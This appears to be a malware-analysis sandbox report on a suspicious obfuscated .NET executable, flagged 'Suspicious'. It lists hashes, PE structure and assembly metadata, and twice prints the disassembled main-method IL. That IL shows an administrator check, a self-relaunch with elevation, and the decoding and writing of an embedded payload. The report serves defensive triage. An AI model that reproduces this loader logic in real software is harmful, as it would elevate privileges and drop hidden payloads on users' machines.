Suspicious
Suspect

4b29686394d84bfa49e6b838996f7573

PE Executable
|
MD5: 4b29686394d84bfa49e6b838996f7573
|
Size: 2.68 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
 Hash Value
MD5
4b29686394d84bfa49e6b838996f7573
Sha1
3acccf8b4f3a213b9246bc393a75bed5b6ea5bb9
Sha256
d8ecbb12c70c8cb2c6ed41eb6e5c528d2824f6ab9e4316709153563883d03d74
Sha384
f31dc058953f35313bc4de4d418405bd0feb48df951f6c7c7aa0c8e4671438d253be4484db7788424cc8a593dd5ab7d6
Sha512
a610ec26572ebea3052ace4c1d2d51452454cb8cd85d33152d2775a13b1f25110bbe5c6d1b9e15715c1aeb131d4f6a6571a78fbe1b237828f5ea24202550b8d5
SSDeep
24576:7xfQEPsJeqlDS7urPboKymKqelg1xWbjFduTD3SyOAAmS0dUFEV+mys:tQEPceqlDHIXZqjxMFA3mF9FEVis
TLSH
96C57CF0A195B840F407EA7AD4CC0CBDAEA23BE1707B4940E6B75A056DA19F1FDC81D6

PeID

Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual Studio .NET
File Structure
4b29686394d84bfa49e6b838996f7573
[Authenticode]_102fd51e.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
FKYsM
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Authenticode present at 0x289200 size 24280 bytes
Module Name

rSCaAQLTUWivdS
Full Name

rSCaAQLTUWivdS
EntryPoint

System.Void qMNgwvPTLxtpuzL.gRjvaxYxniknFg::UsqDpGGVdboKyE(System.String[])
Scope Name

rSCaAQLTUWivdS
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

drlmyCTvystKAHT
Assembly Version

197.135.181.248
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.5
Total Strings

141
Main Method

System.Void qMNgwvPTLxtpuzL.gRjvaxYxniknFg::UsqDpGGVdboKyE(System.String[])
Main IL Instruction Count

82
Main IL

call System.Void MjrGaSqohgXIjc.uuCFLhVmlFzfLnP::lEGFifkahulBRNO() call System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent() newobj System.Void System.Security.Principal.WindowsPrincipal::.ctor(System.Security.Principal.WindowsIdentity) ldc.i4 530 ldc.i4.s -14 sub <null> callvirt System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) brtrue.s IL_005A: call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.2 <null> nop <null> ldloc.2 <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) dup <null> ldstr BZIIudCJTnsGhM call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ldc.i4.s 28 ldc.i4.s 28 sub <null> call System.Void System.Environment::Exit(System.Int32) leave.s IL_002E: nop pop <null> leave.s IL_002E: nop call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() newobj System.Void System.Random::.ctor() ldc.i4.s -32 ldc.i4.s -34 sub <null> callvirt System.Int32 System.Random::Next(System.Int32) ldc.i4.s 101 ldc.i4.s 100 sub <null> beq.s IL_0081: ldstr "TzxRgbgkdRLRqXh" ldstr eipxcomgIIjnRHU call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) br.s IL_008B: call System.String System.String::Concat(System.String,System.String) ldstr TzxRgbgkdRLRqXh call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) call System.String System.String::Concat(System.String,System.String) ldstr cBhRTeeZPtAAKq call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) call System.Byte[] qMNgwvPTLxtpuzL.ZSyfswEavFUmnat::DMpGUGRJJqrcsv(System.String) call System.Text.Encoding System.Text.Encoding::get_ASCII() ldstr CyrZGkuADCETLdV call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) stloc.0 <null> ldloc.0 <null> call System.Byte[] qMNgwvPTLxtpuzL.GWpLlHSBpVBEbhA::uqEBHaDgnMjEUuP(System.Byte[],System.Byte[]) stloc.1 <null> dup <null> ldloc.1 <null> call System.Boolean UDYdUHAGcOZTUt.jhVNsAkKzbbqVo.XDmmDjDelPyJFd::TlPDTVkiyTyZTg(System.String,System.Byte[]) pop <null> ldc.i4.s 109 ldc.i4.s 9 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> dup <null> ldloc.1 <null> call System.Boolean UDYdUHAGcOZTUt.jhVNsAkKzbbqVo.XDmmDjDelPyJFd::TlPDTVkiyTyZTg(System.String,System.Byte[]) pop <null> ldc.i4.s 67 ldc.i4.s -33 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> ldloc.1 <null> call System.Boolean UDYdUHAGcOZTUt.jhVNsAkKzbbqVo.XDmmDjDelPyJFd::TlPDTVkiyTyZTg(System.String,System.Byte[]) pop <null> ldc.i4.s 17 ldc.i4.s -83 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> ret <null>
Module Name

rSCaAQLTUWivdS
Full Name

rSCaAQLTUWivdS
EntryPoint

System.Void qMNgwvPTLxtpuzL.gRjvaxYxniknFg::UsqDpGGVdboKyE(System.String[])
Scope Name

rSCaAQLTUWivdS
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

drlmyCTvystKAHT
Assembly Version

197.135.181.248
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.5
Total Strings

141
Main Method

System.Void qMNgwvPTLxtpuzL.gRjvaxYxniknFg::UsqDpGGVdboKyE(System.String[])
Main IL Instruction Count

82
Main IL

call System.Void MjrGaSqohgXIjc.uuCFLhVmlFzfLnP::lEGFifkahulBRNO() call System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent() newobj System.Void System.Security.Principal.WindowsPrincipal::.ctor(System.Security.Principal.WindowsIdentity) ldc.i4 530 ldc.i4.s -14 sub <null> callvirt System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole) brtrue.s IL_005A: call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.2 <null> nop <null> ldloc.2 <null> newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) dup <null> ldstr BZIIudCJTnsGhM call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> ldc.i4.s 28 ldc.i4.s 28 sub <null> call System.Void System.Environment::Exit(System.Int32) leave.s IL_002E: nop pop <null> leave.s IL_002E: nop call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() newobj System.Void System.Random::.ctor() ldc.i4.s -32 ldc.i4.s -34 sub <null> callvirt System.Int32 System.Random::Next(System.Int32) ldc.i4.s 101 ldc.i4.s 100 sub <null> beq.s IL_0081: ldstr "TzxRgbgkdRLRqXh" ldstr eipxcomgIIjnRHU call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) br.s IL_008B: call System.String System.String::Concat(System.String,System.String) ldstr TzxRgbgkdRLRqXh call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) call System.String System.String::Concat(System.String,System.String) ldstr cBhRTeeZPtAAKq call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) call System.Byte[] qMNgwvPTLxtpuzL.ZSyfswEavFUmnat::DMpGUGRJJqrcsv(System.String) call System.Text.Encoding System.Text.Encoding::get_ASCII() ldstr CyrZGkuADCETLdV call System.String xMYHQaJOlBacvb.QJuWWIAJWcdKWbf.wDmdmjAxDBenPmm::kdYaYsmPTyJChIm(System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) stloc.0 <null> ldloc.0 <null> call System.Byte[] qMNgwvPTLxtpuzL.GWpLlHSBpVBEbhA::uqEBHaDgnMjEUuP(System.Byte[],System.Byte[]) stloc.1 <null> dup <null> ldloc.1 <null> call System.Boolean UDYdUHAGcOZTUt.jhVNsAkKzbbqVo.XDmmDjDelPyJFd::TlPDTVkiyTyZTg(System.String,System.Byte[]) pop <null> ldc.i4.s 109 ldc.i4.s 9 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> dup <null> ldloc.1 <null> call System.Boolean UDYdUHAGcOZTUt.jhVNsAkKzbbqVo.XDmmDjDelPyJFd::TlPDTVkiyTyZTg(System.String,System.Byte[]) pop <null> ldc.i4.s 67 ldc.i4.s -33 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> ldloc.1 <null> call System.Boolean UDYdUHAGcOZTUt.jhVNsAkKzbbqVo.XDmmDjDelPyJFd::TlPDTVkiyTyZTg(System.String,System.Byte[]) pop <null> ldc.i4.s 17 ldc.i4.s -83 sub <null> call System.Threading.Tasks.Task System.Threading.Tasks.Task::Delay(System.Int32) pop <null> ret <null>
4b29686394d84bfa49e6b838996f7573 (2.68 MB)
File Structure
4b29686394d84bfa49e6b838996f7573
[Authenticode]_102fd51e.p7b
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
FKYsM
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙